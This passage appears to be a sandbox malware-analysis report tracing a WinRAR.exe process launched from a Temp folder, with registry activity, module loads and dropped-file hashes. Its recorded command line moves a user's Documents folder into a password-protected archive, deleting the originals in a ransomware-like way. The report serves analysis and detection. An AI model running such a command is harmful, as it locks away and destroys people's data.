Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SaveStreams, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = GenerateArcName, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PackDetails, size = 192, type = REG_BINARY True 1
System Get Time type = System Time, time = 2019-04-02 12:04:16 (UTC) True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = VerInfo, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, type = file_type True 1
File Read filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, size = 4096, size_out = 12 True 1
Mutex Create mutex_name = WinRAR_Busy True 1
Window Find class_name = WinRarWindow True 1
Window Create window_name = WinRAR, class_name = WinRarWindow, wndproc_parameter = 0 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
System Get Time type = Local Time, time = 2019-04-02 16:04:16 (Local Time) True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarkey, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = Priority, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarreg.key, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Extraction False 1
Keyboard Get Info type = KB_CODEPAGE, result_out = 437 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\5 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcName, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileNames False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = UseRAR, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RAR5, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXModule, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFX, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXIcon, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXLogo, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXElevate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtFile, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtDataWide, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextWide, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextData, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolumeSize, data = 0, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolSizeMod, data = 2, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolPause, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OldVolNames, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecVolNumber, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Update, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Fresh, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SyncFiles, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Overwrite, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Move, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcRecBin, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcWipe, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WipeIfPassword, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Solid, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Test, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecEnabled, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecSize, data = 4294967293, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Recovery, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EraseDest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = AddArcOnly, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ClearArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Lock, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Method, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSizeLZ, data = 4194304, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSize, data = 33554432, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PasswordData, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EncryptHeaders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ZipLegacyEncrypt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OpenShared, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ProcessOwners, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveStreams, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
For performance reasons, the remaining 896 entries are omitted.
The remaining entries can be found in glog.xml.
Process #8: winrar.exe
Information Value
ID #8
File Name c:\users\whuoxysd\appdata\local\temp\winrar.exe
Command Line C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Documents *
Initial Working Directory C:\Users\WhuOXYsD\Documents\
Monitor Start Time: 00:00:46, Reason: Child Process
Unmonitor End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration 00:04:37
OS Process Information
Information Value
PID 0xa20
Parent PID 0x8dc (c:\windows\syswow64\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
Dropped Files
Filename: C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat
File Size: 0.01 KB
MD5: 732cf0fc10856b7caadb3f8522ef6947
SHA1: a1debb2f8cbcd9420ff06d9127b72dd3df24daa8
SHA256: f8cfc5341886e9e8b6f76e276172fd81c26b5869397ccf14787fd8d6f1d4c5fa
SSDeep: 3:8i:h
YARA Match: False

Filename: Documents.rar
File Size: 0.02 KB
MD5: d28c293e10139d5d8f6e4592aeaffc1b
SHA1: 3b575420ceea4203152041be00dc80519d1532b5
SHA256: 61126de1b795b976f3ac878f48e88fa77a87d7308ba57c7642b9e1068403a496
SSDeep: 3::
YARA Match: False
Modified Files
Filename: C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat
File Size: 0.01 KB
MD5: 732cf0fc10856b7caadb3f8522ef6947
SHA1: a1debb2f8cbcd9420ff06d9127b72dd3df24daa8
SHA256: f8cfc5341886e9e8b6f76e276172fd81c26b5869397ccf14787fd8d6f1d4c5fa
SSDeep: 3:8i:h
YARA Match: False
Threads
Thread 0xa30
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
System Get Time type = Performance Ctr, time = 12512136863 True 1
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x77b03520 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x77b2b710 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77c384f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x77b2b230 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x77c200b0 True 1
Fn
